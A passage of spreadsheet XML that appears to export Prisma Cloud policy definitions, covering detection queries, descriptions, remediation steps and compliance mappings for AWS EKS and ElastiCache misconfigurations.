          <t>This policy identifies EKS cluster Security groups that are overly permissive to all traffic. Doing so, may allow a bad actor to brute force their way into the system and potentially get access to the entire network. Review your list of security group rules to ensure that your resources are not exposed. As a best practice, restrict traffic solely from known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X1878" t="inlineStr">
        <is>
          <t>Before making any changes, please check the impact on your applications/services. If the Security Group reported indeed need to restrict all traffic, follow the instructions below:
1. Log in to the AWS console
2. Navigate to the 'VPC' service
3. Select the 'Security Group' reported in the alert
4. Click on 'Inbound Rules'
5. Remove the rule which has the 'Source' value as 0.0.0.0/0 or ::/0 
Build Recommendation: Refer the documentation for more details,
https://docs.paloaltonetworks.com/content/techdocs/en_US/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/aws-policies/aws-kubernetes-policies/bc-aws-kubernetes-1.html
IaC: Refer the documentation for more details,
https://docs.paloaltonetworks.com/content/techdocs/en_US/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/aws-policies/aws-kubernetes-policies/bc-aws-kubernetes-1.html</t>
        </is>
      </c>
      <c r="Y1878" t="inlineStr"/>
      <c r="Z1878" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-eks-describe-cluster' as X; config from cloud.resource where api.name = 'aws-ec2-describe-security-groups' AND json.rule = isShared is false and (ipPermissions[*].ipv4Ranges[*] contains 0.0.0.0/0 or ipPermissions[*].ipv6Ranges[*] contains ::/0) as Y; filter '$.X.resourcesVpcConfig.securityGroupIds contains $.Y.groupId or $.X.resourcesVpcConfig.clusterSecurityGroupId contains $.Y.groupId'; show Y;
{"category":"Kubernetes","resourceTypes":["aws_eks_cluster"]}</t>
        </is>
      </c>
      <c r="AA1878" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1878" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1878" t="inlineStr">
        <is>
          <t>PC-AWS-VPC-379-CKV_AWS_38</t>
        </is>
      </c>
      <c r="AD1878" t="b">
        <v>1</v>
      </c>
      <c r="AE1878" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1878" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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8" t="inlineStr">
        <is>
          <t>5cc78081-1006-4874-8b13-bd01583888c4</t>
        </is>
      </c>
      <c r="AI1878" t="inlineStr">
        <is>
          <t>03c96719-f7cf-4c98-8b51-04098e035bdb</t>
        </is>
      </c>
      <c r="AJ1878" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1878" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1879">
      <c r="A1879" t="inlineStr">
        <is>
          <t>Alan Demo</t>
        </is>
      </c>
      <c r="B1879" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1879" s="2" t="inlineStr"/>
      <c r="D1879" t="inlineStr"/>
      <c r="E1879" t="inlineStr"/>
      <c r="F1879" t="inlineStr"/>
      <c r="G1879" t="b">
        <v>0</v>
      </c>
      <c r="H18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79" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1879" t="inlineStr">
        <is>
          <t>aws-eks</t>
        </is>
      </c>
      <c r="K1879" t="inlineStr">
        <is>
          <t>AWS EKS - 45 Days - Owned</t>
        </is>
      </c>
      <c r="L1879" t="inlineStr"/>
      <c r="M1879" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1879" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1879" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1879" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1879" t="inlineStr">
        <is>
          <t>122345</t>
        </is>
      </c>
      <c r="R1879" t="inlineStr">
        <is>
          <t>123456-1</t>
        </is>
      </c>
      <c r="S1879" t="inlineStr"/>
      <c r="T1879" t="b">
        <v>0</v>
      </c>
      <c r="U1879" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1879" t="inlineStr">
        <is>
          <t>aws-eks-node-group</t>
        </is>
      </c>
      <c r="W1879" t="inlineStr"/>
      <c r="X1879" t="inlineStr"/>
      <c r="Y1879" t="inlineStr"/>
      <c r="Z1879" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-eks-node-group' AND json.rule = "_DateTime.ageInDays(createdAt) &gt; 45" AND json.rule = tags contains "owner" addcolumn clusterName createdAt</t>
        </is>
      </c>
      <c r="AA1879" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB1879" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1879" t="inlineStr"/>
      <c r="AD1879" t="b">
        <v>0</v>
      </c>
      <c r="AE1879" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1879" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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79" t="inlineStr">
        <is>
          <t>8e4277d4-99a0-41f5-b6b7-17d8613f09dd</t>
        </is>
      </c>
      <c r="AI1879" t="inlineStr">
        <is>
          <t>bba59755-2b6d-45f5-bd26-3f86b424543e</t>
        </is>
      </c>
      <c r="AJ1879" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1879" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1880">
      <c r="A1880" t="inlineStr"/>
      <c r="B1880" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1880" s="2" t="inlineStr"/>
      <c r="D1880" t="inlineStr"/>
      <c r="E1880" t="inlineStr"/>
      <c r="F1880" t="inlineStr"/>
      <c r="G1880" t="b">
        <v>0</v>
      </c>
      <c r="H18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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1880" t="inlineStr">
        <is>
          <t>aws-eks</t>
        </is>
      </c>
      <c r="K1880" t="inlineStr">
        <is>
          <t>AWS EKS - 7 Days - No Owner</t>
        </is>
      </c>
      <c r="L1880" t="inlineStr"/>
      <c r="M1880" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1880" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1880" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1880" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1880" t="inlineStr"/>
      <c r="R1880" t="inlineStr"/>
      <c r="S1880" t="inlineStr"/>
      <c r="T1880" t="b">
        <v>0</v>
      </c>
      <c r="U1880" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1880" t="inlineStr">
        <is>
          <t>aws-eks-node-group</t>
        </is>
      </c>
      <c r="W1880" t="inlineStr"/>
      <c r="X1880" t="inlineStr"/>
      <c r="Y1880" t="inlineStr"/>
      <c r="Z1880" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-eks-node-group' AND json.rule = "_DateTime.ageInDays(createdAt) &gt; 7" AND json.rule = tags does not contain "owner" addcolumn clusterName createdAt</t>
        </is>
      </c>
      <c r="AA1880" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB1880" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1880" t="inlineStr"/>
      <c r="AD1880" t="b">
        <v>0</v>
      </c>
      <c r="AE1880" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1880" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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0" t="inlineStr">
        <is>
          <t>ada9c900-6dfb-4329-8277-73f8b00aa036</t>
        </is>
      </c>
      <c r="AI1880" t="inlineStr">
        <is>
          <t>bfd84f40-bcc8-434d-bc78-26d74b99b1e8</t>
        </is>
      </c>
      <c r="AJ1880" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1880" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1881">
      <c r="A1881" t="inlineStr">
        <is>
          <t>HIPAA, ISO/IEC 27001:2022, Insurance Regulatory And Development Authority Of India, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NYDFS 23 CRR-NY 500.0, ITSG-33, HITRUST CSF v.11.2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Telecommunications Security Act - TSA, CRI Profile v2.0, Telecommunications Security Act - TSA, Secure Controls Framework (SCF) - 2024.2, DORA, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), Microsoft Cloud Security Benchmark v1, NIST CSF v2.0, Secure Controls Framework (SCF) - 2022.2.1, HIPAA, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2022.2.1, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B1881" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1881" s="2" t="inlineStr"/>
      <c r="D1881" t="inlineStr"/>
      <c r="E1881" t="inlineStr"/>
      <c r="F1881" t="inlineStr"/>
      <c r="G1881" t="b">
        <v>1</v>
      </c>
      <c r="H18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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1881" t="inlineStr">
        <is>
          <t>aws-elasticache</t>
        </is>
      </c>
      <c r="K1881" t="inlineStr">
        <is>
          <t>AWS ElastiCache Memcached cluster with in-transit encryption disabled</t>
        </is>
      </c>
      <c r="L1881" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M1881" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1881" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1881" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1881" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1881" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R1881" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S1881" t="inlineStr"/>
      <c r="T1881" t="b">
        <v>0</v>
      </c>
      <c r="U1881" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1881" t="inlineStr">
        <is>
          <t>aws-elasticache-cache-clusters</t>
        </is>
      </c>
      <c r="W1881" t="inlineStr">
        <is>
          <t>This policy identifies AWS ElastiCache Memcached clusters that have in-transit encryption disabled. It is highly recommended to implement in-transit encryption in order to protect data from unauthorized access as it travels through the network, between clients and cache servers. Enabling data encryption in-transit helps to prevent unauthorized users from reading sensitive data between your Memcached and their associated cache storage systems.</t>
        </is>
      </c>
      <c r="X1881" t="inlineStr">
        <is>
          <t>AWS ElastiCache Memcached in-transit encryption can be set, only at the time of creation. So to resolve this alert, create a new cluster with in-transit encryption enabled, then migrate all required ElastiCache Memcached cluster data from the reported ElastiCache Memcached cluster to this newly created cluster and delete reported ElastiCache Memcached cluster.
To create new ElastiCache Memcached cluster with In-transit encryption set, perform the following:
1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to ElastiCache
4. Click on 'Memcached clusters' under 'Resources'
5. Click on 'Create Memcached clusters' button
6. On the 'Cluster settings' page,
a. Enter a name for the new cache cluster
b. Select Memcached engine version from 'Engine version' dropdown list
Note: As of September 2022,In-transit encryption can be enabled only for AWS ElastiCache clusters with Memcached engine version 1.6.12 or later
c. Enter the 'Subnet group settings' and click on 'Next'
d. Under 'Security', Select 'Enable' checkbox under 'Encryption in transit'
e. Fill in other necessary parameters
7. Click on 'Create' button to launch your new ElastiCache Memcached cluster
To delete reported ElastiCache Memcached cluster follow below given URL:
https://docs.aws.amazon.com/AmazonElastiCache/latest/mem-ug/GettingStarted.DeleteCacheCluster.html</t>
        </is>
      </c>
      <c r="Y1881" t="inlineStr"/>
      <c r="Z1881" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-elasticache-cache-clusters' AND json.rule = engine equals memcached and transitEncryptionEnabled is false</t>
        </is>
      </c>
      <c r="AA1881" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1881" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1881" t="inlineStr">
        <is>
          <t>PC-AWS-EC-940</t>
        </is>
      </c>
      <c r="AD1881" t="b">
        <v>1</v>
      </c>
      <c r="AE1881" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1881" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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1" t="inlineStr">
        <is>
          <t>401ea157-b44f-4e26-b017-945b3fc259e1</t>
        </is>
      </c>
      <c r="AI1881" t="inlineStr">
        <is>
          <t>6de57b6f-7003-4e77-9045-7a677a126baa</t>
        </is>
      </c>
      <c r="AJ1881" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1881" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1882">
      <c r="A1882" t="inlineStr">
        <is>
          <t>HIPAA, PCI DSS v4.0, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, CRI Profile v2.0, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST CSF v2.0, ISO/IEC 27001:2022, CHC HITRUST CSF v.9.6.0, kfirdaus AWS Account-CS, Insurance Regulatory And Development Authority Of India, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), kashan ACSC Information Security Manual (ISM), NYDFS 23 CRR-NY 500.0, ACSC Information Security Manual (ISM), FFIEC, ITSG-33, HITRUST CSF v.11.2.0, CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Telecommunications Security Act - TSA, HITRUST CSF v.9.6.0, CIS Controls v7.1, CRI Profile v2.0, Secure Controls Framework (SCF) - 2022.2.1, CRI Profile v1.2.1, Copy of CIS Controls v8, ISO 27002:2022, Telecommunications Security Act - TSA, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, ACSC Information Security Manual (ISM), DORA, NIST CSF v2.0, PCI DSS v4.0, PCI DSS v4.0, kfirdaus AWS Account-CS, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), DORA, CIS Controls v8.1, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), Microsoft Cloud Security Benchmark v1, kashan ACSC Information Security Manual (ISM), CRI Profile v1.2.1, NIST CSF v2.0, Secure Controls Framework (SCF) - 2022.2.1, CRI Profile v2.0, HIPAA, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, RBI Baseline Cyber Security and Resilience Requirements, NIST 800-53 Rev 5, PCI DSS v4.0</t>
        </is>
      </c>
      <c r="B1882" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1882" s="2" t="inlineStr"/>
      <c r="D1882" t="inlineStr"/>
      <c r="E1882" t="inlineStr"/>
      <c r="F1882" t="inlineStr"/>
      <c r="G1882" t="b">
        <v>1</v>
      </c>
      <c r="H18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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1882" t="inlineStr">
        <is>
          <t>aws-elasticache</t>
        </is>
      </c>
      <c r="K1882" t="inlineStr">
        <is>
          <t>AWS ElastiCache Redis with in-transit encryption disabled (Non-replication group)</t>
        </is>
      </c>
      <c r="L1882" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M1882" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1882" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1882" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1882" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1882" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R1882" t="inlineStr">
        <is>
          <t>ISM-0469</t>
        </is>
      </c>
      <c r="S1882" t="inlineStr"/>
      <c r="T1882" t="b">
        <v>0</v>
      </c>
      <c r="U1882" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1882" t="inlineStr">
        <is>
          <t>aws-elasticache-cache-clusters</t>
        </is>
      </c>
      <c r="W1882" t="inlineStr">
        <is>
          <t>This policy identifies ElastiCache Redis that are in non-replication groups or individual ElastiCache Redis and have in-transit encryption disabled. It is highly recommended to implement in-transit encryption in order to protect data from unauthorized access as it travels through the network, between clients and cache servers. Enabling data encryption in-transit helps prevent unauthorized users from reading sensitive data between your Redis and their associated cache storage systems.</t>
        </is>
      </c>
      <c r="X1882" t="inlineStr">
        <is>
          <t>AWS ElastiCache Redis in-transit encryption can be set, only at the time of creation. So to resolve this alert, create a new cluster with in-transit encryption enabled, then migrate all required ElastiCache Redis cluster data from the reported ElastiCache Redis cluster to this newly created cluster and delete reported ElastiCache Redis cluster.
To create new ElastiCache Redis cluster with In-transit encryption set, perform the following:
1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to ElastiCache Dashboard
4. Click on Redis
5. Click on 'Create' button
6. On the 'Create your Amazon ElastiCache cluster' page,
a. Select 'Redis' cache engine type.
b. Enter a name for the new cache cluster
c. Select Redis engine version from 'Engine version compatibility' dropdown list.
Note: As of July 2018, In-transit encryption can be enabled only for AWS ElastiCache clusters with Redis engine version 3.2.6 and 4.0.10.
d. Click on 'Advanced Redis settings' to expand the cluster advanced settings panel
e. Select 'Encryption in-transit' checkbox to enable encryption along with other necessary parameters
7. Click on 'Create' button to launch your new ElastiCache Redis cluster
To delete reported ElastiCache Redis cluster, perform the following:
1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to ElastiCache Dashboard
4. Click on Redis
5. Select reported Redis cluster
6. Click on 'Delete' button
7. In the 'Delete Cluster' dialog box, if you want a backup for your cluster select 'Yes' from the 'Create final backup' dropdown menu, provide a name for the cluster backup, then click on 'Delete'.</t>
        </is>
      </c>
      <c r="Y1882" t="inlineStr"/>
      <c r="Z1882" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-elasticache-cache-clusters' AND json.rule = engine equals redis and transitEncryptionEnabled is false and replicationGroupId does not exist</t>
        </is>
      </c>
      <c r="AA1882" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1882" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1882" t="inlineStr">
        <is>
          <t>PC-AWS-EC-779</t>
        </is>
      </c>
      <c r="AD1882" t="b">
        <v>1</v>
      </c>
      <c r="AE1882" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1882" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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2" t="inlineStr">
        <is>
          <t>094e67d5-b9f0-4c73-a23b-a81d09e55a73</t>
        </is>
      </c>
      <c r="AI1882" t="inlineStr">
        <is>
          <t>a67d790e-e721-4b9d-91e3-b2091af0f54b</t>
        </is>
      </c>
      <c r="AJ1882" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1882" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1883">
      <c r="A1883" t="inlineStr">
        <is>
          <t>NIST 800-53 Rev 5, Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, CIS Controls v8.1</t>
        </is>
      </c>
      <c r="B1883" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1883" s="2" t="inlineStr"/>
      <c r="D1883" t="inlineStr"/>
      <c r="E1883" t="inlineStr"/>
      <c r="F1883" t="inlineStr"/>
      <c r="G1883" t="b">
        <v>1</v>
      </c>
      <c r="H18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83" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1883" t="inlineStr">
        <is>
          <t>aws-elasticache</t>
        </is>
      </c>
      <c r="K1883" t="inlineStr">
        <is>
          <t>AWS ElastiCache cluster not using supported engine version</t>
        </is>
      </c>
      <c r="L1883" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1883" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1883" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1883" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1883" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1883" t="inlineStr">
        <is>
          <t>Control 7</t>
        </is>
      </c>
      <c r="R1883" t="inlineStr">
        <is>
          <t>Safeguard 7.1 : Establish and Maintain a Vulnerability Management Process</t>
        </is>
      </c>
      <c r="S1883" t="inlineStr"/>
      <c r="T1883" t="b">
        <v>0</v>
      </c>
      <c r="U1883" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1883" t="inlineStr">
        <is>
          <t>aws-elasticache-cache-clusters</t>
        </is>
      </c>
      <c r="W1883" t="inlineStr">
        <is>
          <t>This policy identifies AWS Elastic Redis or Memcache cluster not using the supported engine version.
AWS ElastiCache simplifies deploying, operating, and scaling Redis and Memcached in-memory caches in the cloud. An ElastiCache cluster not using a supported engine version runs on outdated Redis or Memcached versions. These versions may be end-of-life (EOL) or lack current updates and patches from AWS. This exposes the cluster to unpatched vulnerabilities, compliance risks, and potential service instability.
It is recommended to regularly update your ElastiCache clusters to the latest supported engine versions as recommended by AWS.</t>
        </is>
      </c>
      <c r="X1883" t="inlineStr">
        <is>
          <t>To Upgrade the AWS ElastiCache cluster perform the following actions:
1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to ElastiCache Dashboard
4. Click on 'Redis caches' under the 'Resources' section
5. Select reported Redis cluster
6. Click on 'Modify' button
7. In the 'Modify Cluster' dialog box, Under the 'Cluster settings' section 
8. Select 'Engine version' from the drop down according to your requirements.
9. select 'Parameter groups' family that is compatible with the new engine version.
10. Click on 'Preview Changes'
11. Select Yes checkbox under 'Apply Immediately' , to apply the configuration changes immediately. If Apply Immediately is not selected, the changes will be processed during the next maintenance window.
12. Click on 'Modify'</t>
        </is>
      </c>
      <c r="Y1883" t="inlineStr"/>
      <c r="Z1883" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-elasticache-cache-clusters' as X; config from cloud.resource where api.name = 'aws-cache-engine-versions' as Y; filter 'not( $.X.engine equals $.Y.engine and $.Y.cacheEngineVersionDescription contains $.X.engineVersion)'; show X;</t>
        </is>
      </c>
      <c r="AA1883" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1883" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1883" t="inlineStr">
        <is>
          <t>PC-AWS-EC-1234</t>
        </is>
      </c>
      <c r="AD1883" t="b">
        <v>1</v>
      </c>
      <c r="AE1883" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1883" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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83" t="inlineStr">
        <is>
          <t>e99eb781-c473-4b65-8308-3c345b52cb5f</t>
        </is>
      </c>
      <c r="AI1883" t="inlineStr">
        <is>
          <t>d559291a-5cf3-483b-8a65-076fd90542d0</t>
        </is>
      </c>
      <c r="AJ1883" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1883" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1884">
      <c r="A1884" t="inlineStr"/>
      <c r="B1884" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1884" s="2" t="inlineStr"/>
      <c r="D1884" t="inlineStr"/>
      <c r="E1884" t="inlineStr"/>
      <c r="F1884" t="inlineStr"/>
      <c r="G1884" t="b">
        <v>1</v>
      </c>
      <c r="H18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84" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1884" t="inlineStr">
        <is>
          <t>aws-elasticache</t>
        </is>
      </c>
      <c r="K1884" t="inlineStr">
        <is>
          <t>AWS ElastiCache Redis cluster automatic version upgrade disabled</t>
        </is>
      </c>
      <c r="L1884" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1884" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1884" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1884" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1884" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1884" t="inlineStr"/>
      <c r="R1884" t="inlineStr"/>
      <c r="S1884" t="inlineStr"/>
      <c r="T1884" t="b">
        <v>0</v>
      </c>
      <c r="U1884" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1884" t="inlineStr">
        <is>
          <t>aws-elasticache-cache-clusters</t>
        </is>
      </c>
      <c r="W1884" t="inlineStr">
        <is>
          <t>This policy identifies the ElastiCache Redis clusters that do not have the auto minor version upgrade feature enabled.
An ElastiCache Redis cluster is a fully managed in-memory data store used to cache frequently accessed data, reducing latency and improving application performance. Failure to enable automatic minor upgrades can leave your cache clusters vulnerable to security risks stemming from outdated software.
It is recommended to enable automatic minor version upgrades on ElastiCache Redis clusters to receive timely patches and updates, reduce the risk of security vulnerabilities, and improve overall performance and stability.</t>
        </is>
      </c>
      <c r="X1884" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console. Navigate to the ElastiCache Dashboard
2. Click on 'Redis caches' under the 'Resources' section
3. Select the reported Redis cluster
4. Click on the 'Modify' button
5. In the 'Modify' page, under the 'Maintenance' section
6. Find the 'Auto upgrade minor versions' setting and click on 'Enable'
7. Click on 'Preview changes'. Under 'Apply immediately', select 'Yes'
8. Click on 'Modify'. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-322
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-322</t>
        </is>
      </c>
      <c r="Y1884" t="inlineStr"/>
      <c r="Z1884" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-elasticache-cache-clusters' AND json.rule = engine contains redis and autoMinorVersionUpgrade is false
{"category":"General","resourceTypes":["aws_elasticache_cluster"]}</t>
        </is>
      </c>
      <c r="AA1884" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1884" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1884" t="inlineStr">
        <is>
          <t>PC-AWS-EC-1228-CKV_AWS_322</t>
        </is>
      </c>
      <c r="AD1884" t="b">
        <v>1</v>
      </c>
      <c r="AE1884" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1884" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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84" t="inlineStr">
        <is>
          <t>5434adda-c728-44e7-aa45-fb6060b698b4</t>
        </is>
      </c>
      <c r="AI1884" t="inlineStr">
        <is>
          <t>0bf65873-3a3a-4141-af26-dd06dde22bb6</t>
        </is>
      </c>
      <c r="AJ1884" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1884" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1885">
      <c r="A1885" t="inlineStr">
        <is>
